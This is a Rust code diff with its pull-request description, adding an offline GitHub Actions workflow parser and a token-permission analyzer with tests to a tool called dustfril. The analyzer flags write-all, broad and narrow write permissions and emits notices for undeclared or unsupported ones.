+use std::{collections::BTreeMap, fs, path::Path};
+
+use serde::Deserialize;
+use serde_yaml::Value;
+
+use crate::{
+    error::{DustError, DustResult},
+    models::{Workflow, WorkflowJob, WorkflowPermissionLevel, WorkflowPermissions, WorkflowStep},
+};
+
+#[derive(Debug, Deserialize)]
+struct RawWorkflow {
+    #[serde(default)]
+    name: Option<String>,
+    #[serde(default)]
+    permissions: Option<Value>,
+    #[serde(default)]
+    env: BTreeMap<String, Value>,
+    #[serde(default)]
+    jobs: Option<BTreeMap<String, RawJob>>,
+}
+
+#[derive(Debug, Deserialize)]
+struct RawJob {
+    #[serde(default)]
+    name: Option<String>,
+    #[serde(default)]
+    uses: Option<String>,
+    #[serde(default)]
+    with: BTreeMap<String, Value>,
+    #[serde(default)]
+    permissions: Option<Value>,
+    #[serde(default)]
+    env: BTreeMap<String, Value>,
+    #[serde(default)]
+    steps: Vec<RawStep>,
+}
+
+#[derive(Debug, Deserialize)]
+struct RawStep {
+    #[serde(default)]
+    name: Option<String>,
+    #[serde(default)]
+    id: Option<String>,
+    #[serde(default)]
+    uses: Option<String>,
+    #[serde(default)]
+    with: BTreeMap<String, Value>,
+    #[serde(default)]
+    env: BTreeMap<String, Value>,
+    #[serde(default)]
+    run: Option<String>,
+}
+
+pub fn discover_and_parse(root: &Path) -> DustResult<Vec<Workflow>> {
+    validate_root(root)?;
+
+    let workflows_dir = root.join(".github").join("workflows");
+    let metadata = match fs::symlink_metadata(&workflows_dir) {
+        Ok(metadata) => metadata,
+        Err(error) if error.kind() == std::io::ErrorKind::NotFound => return Ok(Vec::new()),
+        Err(error) => return Err(workflow_io_error(&workflows_dir, error)),
+    };
+
+    if metadata.file_type().is_symlink() {
+        return Err(DustError::Workflow(format!(
+            "{}: symbolic workflow directories are unsupported",
+            workflows_dir.display()
+        )));
+    }
+    if !metadata.is_dir() {
+        return Err(DustError::Workflow(format!(
+            "{}: expected a directory",
+            workflows_dir.display()
+        )));
+    }
+
+    let mut paths = Vec::new();
+    for entry in
+        fs::read_dir(&workflows_dir).map_err(|error| workflow_io_error(&workflows_dir, error))?
+    {
+        let entry = entry.map_err(|error| workflow_io_error(&workflows_dir, error))?;
+        let path = entry.path();
+
+        if !is_workflow_file(&path) {
+            continue;
+        }
+
+        let metadata =
+            fs::symlink_metadata(&path).map_err(|error| workflow_io_error(&path, error))?;
+        if metadata.file_type().is_symlink() {
+            return Err(DustError::Workflow(format!(
+                "{}: symbolic workflow files are unsupported",
+                path.display()
+            )));
+        }
+        if metadata.is_file() {
+            paths.push(path);
+        }
+    }
+
+    paths.sort();
+    paths
+        .into_iter()
+        .map(|path| {
+            let content =
+                fs::read_to_string(&path).map_err(|error| workflow_io_error(&path, error))?;
+            parse_workflow(&path, &content)
+        })
+        .collect()
+}
+
+fn is_workflow_file(path: &Path) -> bool {
+    matches!(
+        path.extension().and_then(|extension| extension.to_str()),
+        Some("yml" | "yaml")
+    )
+}
+
+fn parse_workflow(path: &Path, content: &str) -> DustResult<Workflow> {
+    let raw: RawWorkflow =
+        serde_yaml::from_str(content).map_err(|error| parse_error(path, error.to_string()))?;
+    let jobs = raw.jobs.ok_or_else(|| {
+        parse_error(
+            path,
+            "workflow is missing the required jobs mapping".to_owned(),
+        )
+    })?;
+
+    let permissions = raw
+        .permissions
+        .as_ref()
+        .map(|value| parse_permissions(value).map_err(|error| error_with_path(path, error)))
+        .transpose()?;
+
+    let jobs = jobs
+        .into_iter()
+        .map(|(id, job)| {
+            let permissions = job
+                .permissions
+                .as_ref()
+                .map(|value| parse_permissions(value).map_err(|error| error_with_path(path, error)))
+                .transpose()?;
+            let workflow_job = WorkflowJob {
+                name: job.name,
+                uses: job.uses,
+                with: job.with,
+                permissions,
+                env: job.env,
+                steps: job.steps.into_iter().map(WorkflowStep::from).collect(),
+            };
+            Ok::<_, DustError>((id, workflow_job))
+        })
+        .collect::<DustResult<BTreeMap<_, _>>>()?;
+
+    Ok(Workflow {
+        path: path.to_path_buf(),
+        name: raw.name,
+        permissions,
+        env: raw.env,
+        jobs,
+    })
+}
+
+impl From<RawStep> for WorkflowStep {
+    fn from(step: RawStep) -> Self {
+        Self {
+            name: step.name,
+            id: step.id,
+            uses: step.uses,
+            with: step.with,
+            env: step.env,
+            run: step.run,
+        }
+    }
+}
+
+fn parse_permissions(value: &Value) -> DustResult<WorkflowPermissions> {
+    match value {
+        Value::String(value) => Ok(match value.as_str() {
+            "read-all" => WorkflowPermissions::ReadAll,
+            "write-all" => WorkflowPermissions::WriteAll,
+            other => WorkflowPermissions::Unknown(other.to_owned()),
+        }),
+        Value::Mapping(mapping) if mapping.is_empty() => Ok(WorkflowPermissions::Empty),
+        Value::Mapping(mapping) => {
+            let mut permissions = BTreeMap::new();
+            for (scope, level) in mapping {
+                let scope = scope.as_str().ok_or_else(|| {
+                    DustError::Workflow(
+                        "permissions mapping contains a non-string scope".to_owned(),
+                    )
+                })?;
+                permissions.insert(scope.to_owned(), parse_permission_level(level));
+            }
+            Ok(WorkflowPermissions::Map(permissions))
+        }
+        other => Ok(WorkflowPermissions::Unknown(value_summary(other))),
+    }
+}
+
+fn parse_permission_level(value: &Value) -> WorkflowPermissionLevel {
+    match value.as_str() {
+        Some("none") => WorkflowPermissionLevel::None,
+        Some("read") => WorkflowPermissionLevel::Read,
+        Some("write") => WorkflowPermissionLevel::Write,
+        _ => WorkflowPermissionLevel::Unknown(value_summary(value)),
+    }
+}
+
+fn value_summary(value: &Value) -> String {
+    serde_yaml::to_string(value)
+        .map(|value| value.trim().to_owned())
+        .unwrap_or_else(|_| "<unrepresentable YAML value>".to_owned())
+}
+
+fn validate_root(root: &Path) -> DustResult<()> {
+    match fs::symlink_metadata(root) {
+        Ok(metadata) if metadata.file_type().is_symlink() || !metadata.is_dir() => {
+            Err(DustError::InvalidPath(root.to_path_buf()))
+        }
+        Ok(_) => Ok(()),
+        Err(error) if error.kind() == std::io::ErrorKind::NotFound => {
+            Err(DustError::InvalidPath(root.to_path_buf()))
+        }
+        Err(error) => Err(DustError::Io(error)),
+    }
+}
+
+fn parse_error(path: &Path, message: String) -> DustError {
+    DustError::Workflow(format!("{}: {message}", path.display()))
+}
+
+fn error_with_path(path: &Path, error: DustError) -> DustError {
+    match error {
+        DustError::Workflow(message) => parse_error(path, message),
+        other => other,
+    }
+}
+
+fn workflow_io_error(path: &Path, error: std::io::Error) -> DustError {
+    DustError::Workflow(format!("{}: {error}", path.display()))
+}
+
+#[cfg(test)]
+mod tests {
+    use tempfile::TempDir;
+
+    use super::*;
+
+    fn workflow_dir(temp_dir: &TempDir) -> std::path::PathBuf {
+        let directory = temp_dir.path().join(".github/workflows");
+        std::fs::create_dir_all(&directory).unwrap();
+        directory
+    }
+
+    #[test]
+    fn discovers_only_direct_yaml_workflow_files_in_sorted_order() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = workflow_dir(&temp_dir);
+        std::fs::write(
+            directory.join("z.yaml"),
+            "name: z\njobs:\n  z:\n    steps: []\n",
+        )
+        .unwrap();
+        std::fs::write(
+            directory.join("a.yml"),
+            "name: a\njobs:\n  a:\n    steps: []\n",
+        )
+        .unwrap();
+        std::fs::write(directory.join("not-a-workflow.txt"), "jobs: {}").unwrap();
+        std::fs::create_dir(directory.join("nested.yml")).unwrap();
+        std::fs::write(directory.join("nested.yml/ignored.yml"), "jobs: {}\n").unwrap();
+
+        let workflows = discover_and_parse(temp_dir.path()).unwrap();
+
+        assert_eq!(workflows.len(), 2);
+        assert!(workflows[0].path.ends_with("a.yml"));
+        assert!(workflows[1].path.ends_with("z.yaml"));
+    }
+
+    #[test]
+    fn parses_structure_and_multiline_run_without_flat_text_matching() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = workflow_dir(&temp_dir);
+        let path = directory.join("build.yml");
+        std::fs::write(
+            &path,
+            r#"name: Build
+env:
+  WORKFLOW_VALUE: value
+jobs:
+  build:
+    name: Build job
+    env:
+      JOB_VALUE: job
+    steps:
+      - name: Run build
+        id: build
+        run: |
+          echo "$WORKFLOW_VALUE"
+          cargo build
+        env:
+          STEP_VALUE: step
+      - uses: actions/checkout@v7
+        with:
+          fetch-depth: 0
+"#,
+        )
+        .unwrap();
+
+        let workflow = discover_and_parse(temp_dir.path()).unwrap().remove(0);
+        let job = &workflow.jobs["build"];
+
+        assert_eq!(workflow.name.as_deref(), Some("Build"));
+        assert_eq!(
+            workflow.env["WORKFLOW_VALUE"],
+            Value::String("value".into())
+        );
+        assert_eq!(job.env["JOB_VALUE"], Value::String("job".into()));
+        assert_eq!(
+            job.steps[0].run.as_deref(),
+            Some("echo \"$WORKFLOW_VALUE\"\ncargo build\n")
+        );
+        assert_eq!(job.steps[0].env["STEP_VALUE"], Value::String("step".into()));
+        assert_eq!(job.steps[1].uses.as_deref(), Some("actions/checkout@v7"));
+        assert_eq!(
+            job.steps[1].with["fetch-depth"],
+            serde_yaml::from_str::<Value>("0").unwrap()
+        );
+        assert_eq!(job.steps[0].id.as_deref(), Some("build"));
+    }
+
+    #[test]
+    fn supports_yaml_anchors_and_aliases_in_retained_environment_metadata() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = workflow_dir(&temp_dir);
+        std::fs::write(
+            directory.join("anchors.yml"),
+            "env: &shared\n  SHARED_VALUE: shared\njobs:\n  build:\n    env: *shared\n    steps: []\n",
+        )
+        .unwrap();
+
+        let workflow = discover_and_parse(temp_dir.path()).unwrap().remove(0);
+
+        assert_eq!(
+            workflow.jobs["build"].env["SHARED_VALUE"],
+            Value::String("shared".into())
+        );
+    }
+
+    #[test]
+    fn parses_supported_permission_forms_and_retains_unknown_values() {
+        assert_eq!(
+            parse_permissions(&Value::String("read-all".into())).unwrap(),
+            WorkflowPermissions::ReadAll
+        );
+        assert_eq!(
+            parse_permissions(&Value::String("write-all".into())).unwrap(),
+            WorkflowPermissions::WriteAll
+        );
+        assert_eq!(
+            parse_permissions(&Value::Mapping(Default::default())).unwrap(),
+            WorkflowPermissions::Empty
+        );
+
+        let value: Value = serde_yaml::from_str("contents: read\npull-requests: write\n").unwrap();
+        assert!(matches!(
+            parse_permissions(&value).unwrap(),
+            WorkflowPermissions::Map(_)
+        ));
+        assert!(matches!(
+            parse_permissions(&Value::String("future-all".into())).unwrap(),
+            WorkflowPermissions::Unknown(_)
+        ));
+    }
+
+    #[test]
+    fn malformed_yaml_and_missing_jobs_are_explicit_errors() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = workflow_dir(&temp_dir);
+        std::fs::write(directory.join("bad.yml"), "jobs: [").unwrap();
+
+        let result = discover_and_parse(temp_dir.path());
+
+        assert!(matches!(
+            result,
+            Err(DustError::Workflow(message)) if message.contains("bad.yml")
+        ));
+
+        std::fs::write(directory.join("bad.yml"), "name: missing jobs\n").unwrap();
+        let result = discover_and_parse(temp_dir.path());
+        assert!(matches!(
+            result,
+            Err(DustError::Workflow(message)) if message.contains("required jobs")
+        ));
+    }
+
+    #[test]
+    fn unsupported_permission_mapping_errors_identify_the_workflow_path() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = workflow_dir(&temp_dir);
+        std::fs::write(
+            directory.join("unsupported.yml"),
+            "permissions:\n  1: write\njobs: {}\n",
+        )
+        .unwrap();
+
+        let result = discover_and_parse(temp_dir.path());
+
+        assert!(matches!(
+            result,
+            Err(DustError::Workflow(message))
+                if message.contains("unsupported.yml") && message.contains("non-string scope")
+        ));
+    }
+}

--- a/crates/dustfril-core/src/workflow/permissions.rs
+++ b/crates/dustfril-core/src/workflow/permissions.rs
@@ -68,7 +68,7 @@ fn analyze_scope(
                     workflow_path: workflow.path.clone(),
                     job_id: job.map(|(job_id, _)| job_id.to_owned()),
                     reason: format!(
-                        "Permission mapping contains an unsupported level; effective write scope is unresolved ({})",
+                        "Permission mapping contains an unsupported level or scope; effective write scope is unresolved ({})",
                         permissions.summary()
                     ),
                 });
@@ -281,5 +281,23 @@ mod tests {
         assert!(findings.is_empty());
         assert_eq!(notices.len(), 1);
         assert!(notices[0].reason.contains("unsupported"));
+    }
+
+    #[test]
+    fn unsupported_permission_scopes_are_partial_and_not_counted_as_writes() {
+        let (findings, notices) = findings_for(&workflow(
+            None,
+            Some(map(&[(
+                "custom-scope",
+                WorkflowPermissionLevel::Unknown(
+                    "unsupported permission scope: custom-scope".to_owned(),
+                ),
+            )])),
+        ));
+
+        assert!(findings.is_empty());
+        assert_eq!(notices.len(), 1);
+        assert!(notices[0].reason.contains("unsupported level or scope"));
+        assert!(notices[0].reason.contains("custom-scope"));
     }
 }

--- a/crates/dustfril-core/src/workflow/permissions.rs
+++ b/crates/dustfril-core/src/workflow/permissions.rs
@@ -1,0 +1,285 @@
+use crate::models::{
+    RiskLevel, Workflow, WorkflowFinding, WorkflowFindingCategory, WorkflowJob,
+    WorkflowPermissionLevel, WorkflowPermissions, WorkflowScanNotice,
+};
+
+const WRITE_ALL_RULE: &str = "workflow-write-all-permissions";
+const BROAD_WRITE_RULE: &str = "workflow-broad-write-permissions";
+const NARROW_WRITE_RULE: &str = "workflow-narrow-write-permission";
+
+pub fn analyze(
+    workflow: &Workflow,
+    findings: &mut Vec<WorkflowFinding>,
+    notices: &mut Vec<WorkflowScanNotice>,
+) {
+    if workflow.jobs.is_empty() {
+        analyze_scope(
+            workflow,
+            None,
+            workflow.permissions.as_ref(),
+            findings,
+            notices,
+        );
+        return;
+    }
+
+    for (job_id, job) in &workflow.jobs {
+        analyze_scope(
+            workflow,
+            Some((job_id, job)),
+            job.permissions.as_ref().or(workflow.permissions.as_ref()),
+            findings,
+            notices,
+        );
+    }
+}
+
+fn analyze_scope(
+    workflow: &Workflow,
+    job: Option<(&str, &WorkflowJob)>,
+    permissions: Option<&WorkflowPermissions>,
+    findings: &mut Vec<WorkflowFinding>,
+    notices: &mut Vec<WorkflowScanNotice>,
+) {
+    let Some(permissions) = permissions else {
+        notices.push(WorkflowScanNotice {
+            workflow_path: workflow.path.clone(),
+            job_id: job.map(|(job_id, _)| job_id.to_owned()),
+            reason: "Effective token permissions are not declared; repository and event defaults are outside this offline analyzer's scope.".to_owned(),
+        });
+        return;
+    };
+
+    match permissions {
+        WorkflowPermissions::WriteAll => findings.push(permission_finding(
+            workflow,
+            job,
+            WRITE_ALL_RULE,
+            RiskLevel::High,
+            permissions.summary(),
+            "The workflow grants write access to every available GitHub token permission, so a compromised step can act broadly with the token.".to_owned(),
+        )),
+        WorkflowPermissions::Map(permission_map) => {
+            if permission_map
+                .values()
+                .any(|level| matches!(level, WorkflowPermissionLevel::Unknown(_)))
+            {
+                notices.push(WorkflowScanNotice {
+                    workflow_path: workflow.path.clone(),
+                    job_id: job.map(|(job_id, _)| job_id.to_owned()),
+                    reason: format!(
+                        "Permission mapping contains an unsupported level; effective write scope is unresolved ({})",
+                        permissions.summary()
+                    ),
+                });
+                return;
+            }
+
+            let write_permissions: Vec<_> = permission_map
+                .iter()
+                .filter(|(_, level)| matches!(level, WorkflowPermissionLevel::Write))
+                .map(|(scope, _)| scope.as_str())
+                .collect();
+            let material_write_permissions: Vec<_> = write_permissions
+                .iter()
+                .copied()
+                .filter(|scope| *scope != "id-token")
+                .collect();
+
+            if material_write_permissions.is_empty() {
+                return;
+            }
+
+            let (rule_id, risk_level, reason) = if material_write_permissions.len() >= 2 {
+                (
+                    BROAD_WRITE_RULE,
+                    RiskLevel::High,
+                    format!(
+                        "The workflow grants write access to multiple token scopes ({}), broadening what a compromised step can modify.",
+                        material_write_permissions.join(", ")
+                    ),
+                )
+            } else {
+                (
+                    NARROW_WRITE_RULE,
+                    RiskLevel::Medium,
+                    format!(
+                        "The workflow grants write access to the narrow token scope {}; review whether that write capability is required.",
+                        material_write_permissions[0]
+                    ),
+                )
+            };
+
+            findings.push(permission_finding(
+                workflow,
+                job,
+                rule_id,
+                risk_level,
+                permissions.summary(),
+                reason,
+            ));
+        }
+        WorkflowPermissions::Unknown(value) => notices.push(WorkflowScanNotice {
+            workflow_path: workflow.path.clone(),
+            job_id: job.map(|(job_id, _)| job_id.to_owned()),
+            reason: format!(
+                "Permission declaration {value} is unsupported; effective token scope is unresolved."
+            ),
+        }),
+        WorkflowPermissions::ReadAll | WorkflowPermissions::Empty => {}
+    }
+}
+
+fn permission_finding(
+    workflow: &Workflow,
+    job: Option<(&str, &WorkflowJob)>,
+    rule_id: &str,
+    risk_level: RiskLevel,
+    evidence: String,
+    reason: String,
+) -> WorkflowFinding {
+    WorkflowFinding {
+        workflow_path: workflow.path.clone(),
+        job_id: job.map(|(job_id, _)| job_id.to_owned()),
+        step_index: None,
+        step_name: None,
+        rule_id: rule_id.to_owned(),
+        category: WorkflowFindingCategory::TokenPermissions,
+        risk_level,
+        evidence: Some(evidence),
+        reason,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use std::{collections::BTreeMap, path::PathBuf};
+
+    use super::*;
+
+    fn workflow(
+        permissions: Option<WorkflowPermissions>,
+        job_permissions: Option<WorkflowPermissions>,
+    ) -> Workflow {
+        Workflow {
+            path: PathBuf::from(".github/workflows/test.yml"),
+            name: None,
+            permissions,
+            env: BTreeMap::new(),
+            jobs: BTreeMap::from([(
+                "build".to_owned(),
+                WorkflowJob {
+                    name: None,
+                    uses: None,
+                    with: BTreeMap::new(),
+                    permissions: job_permissions,
+                    env: BTreeMap::new(),
+                    steps: Vec::new(),
+                },
+            )]),
+        }
+    }
+
+    fn map(entries: &[(&str, WorkflowPermissionLevel)]) -> WorkflowPermissions {
+        WorkflowPermissions::Map(
+            entries
+                .iter()
+                .map(|(scope, level)| ((*scope).to_owned(), level.clone()))
+                .collect(),
+        )
+    }
+
+    fn findings_for(workflow: &Workflow) -> (Vec<WorkflowFinding>, Vec<WorkflowScanNotice>) {
+        let mut findings = Vec::new();
+        let mut notices = Vec::new();
+        analyze(workflow, &mut findings, &mut notices);
+        (findings, notices)
+    }
+
+    #[test]
+    fn reports_write_all_with_job_context() {
+        let (findings, notices) =
+            findings_for(&workflow(Some(WorkflowPermissions::WriteAll), None));
+
+        assert!(notices.is_empty());
+        assert_eq!(findings.len(), 1);
+        assert_eq!(findings[0].rule_id, WRITE_ALL_RULE);
+        assert_eq!(findings[0].risk_level, RiskLevel::High);
+        assert_eq!(findings[0].job_id.as_deref(), Some("build"));
+        assert!(findings[0].reason.contains("every available"));
+    }
+
+    #[test]
+    fn read_all_and_empty_permissions_are_clean() {
+        for permissions in [WorkflowPermissions::ReadAll, WorkflowPermissions::Empty] {
+            let (findings, notices) = findings_for(&workflow(Some(permissions), None));
+            assert!(findings.is_empty());
+            assert!(notices.is_empty());
+        }
+    }
+
+    #[test]
+    fn job_permissions_replace_workflow_permissions() {
+        let (findings, notices) = findings_for(&workflow(
+            Some(WorkflowPermissions::WriteAll),
+            Some(WorkflowPermissions::Empty),
+        ));
+
+        assert!(findings.is_empty());
+        assert!(notices.is_empty());
+    }
+
+    #[test]
+    fn reports_broad_and_narrow_writes_without_calling_them_malware() {
+        let (broad_findings, _) = findings_for(&workflow(
+            None,
+            Some(map(&[
+                ("contents", WorkflowPermissionLevel::Write),
+                ("pull-requests", WorkflowPermissionLevel::Write),
+            ])),
+        ));
+        assert_eq!(broad_findings[0].rule_id, BROAD_WRITE_RULE);
+        assert_eq!(broad_findings[0].risk_level, RiskLevel::High);
+        assert!(
+            broad_findings[0]
+                .evidence
+                .as_deref()
+                .unwrap()
+                .contains("contents: write")
+        );
+
+        let (narrow_findings, _) = findings_for(&workflow(
+            None,
+            Some(map(&[("contents", WorkflowPermissionLevel::Write)])),
+        ));
+        assert_eq!(narrow_findings[0].rule_id, NARROW_WRITE_RULE);
+        assert_eq!(narrow_findings[0].risk_level, RiskLevel::Medium);
+    }
+
+    #[test]
+    fn id_token_write_alone_is_not_reported_as_malicious() {
+        let (findings, notices) = findings_for(&workflow(
+            None,
+            Some(map(&[("id-token", WorkflowPermissionLevel::Write)])),
+        ));
+
+        assert!(findings.is_empty());
+        assert!(notices.is_empty());
+    }
+
+    #[test]
+    fn undeclared_or_unknown_permissions_are_explicitly_partial() {
+        let (findings, notices) = findings_for(&workflow(None, None));
+        assert!(findings.is_empty());
+        assert_eq!(notices.len(), 1);
+        assert!(notices[0].reason.contains("not declared"));
+
+        let (findings, notices) = findings_for(&workflow(
+            None,
+            Some(WorkflowPermissions::Unknown("future-all".to_owned())),
+        ));
+        assert!(findings.is_empty());
+        assert_eq!(notices.len(), 1);
+        assert!(notices[0].reason.contains("unsupported"));
+    }
+}


### PR DESCRIPTION
## What

Add a local, read-only GitHub Actions workflow security scanner in dustfril-core with a `dfr security workflows [path]` CLI command.

## Why

Implements the structural workflow discovery, parsing, effective permission analysis, and suspicious `run:` command checks requested in #68. The parser preserves workflow/job/step environment data plus action `uses`/`with` metadata for the follow-up secret exposure work.

Closes #68

## Checklist

### Required

- [x] `cargo check` passes
- [x] `cargo fmt --all -- --check` passes
- [x] `cargo clippy --workspace --all-targets -- -D warnings` passes
- [x] `cargo test --workspace` passes

### Functional Validation

- [x] Verified `dfr security workflows .` locally against the repository workflows
- [x] Added deterministic parser, command-rule, permission, API, and CLI tests
- [x] `cargo llvm-cov --workspace --all-features --summary-only` passes

### Documentation

- [x] README and core/CLI documentation updated

### Safety

- [x] Scanner is offline/read-only and never executes workflow steps or actions
- [x] No cleanup behavior changed

## Notes

- `read-all` and empty permissions are clean.
- `write-all` and broad write combinations produce structured findings; narrow writes are reported at medium severity.
- `id-token: write` alone is not reported as malicious.
- Undeclared or unsupported effective permissions produce partial-analysis notices instead of guessed results.
- Malformed or unreadable workflow files fail with path-specific inspection errors.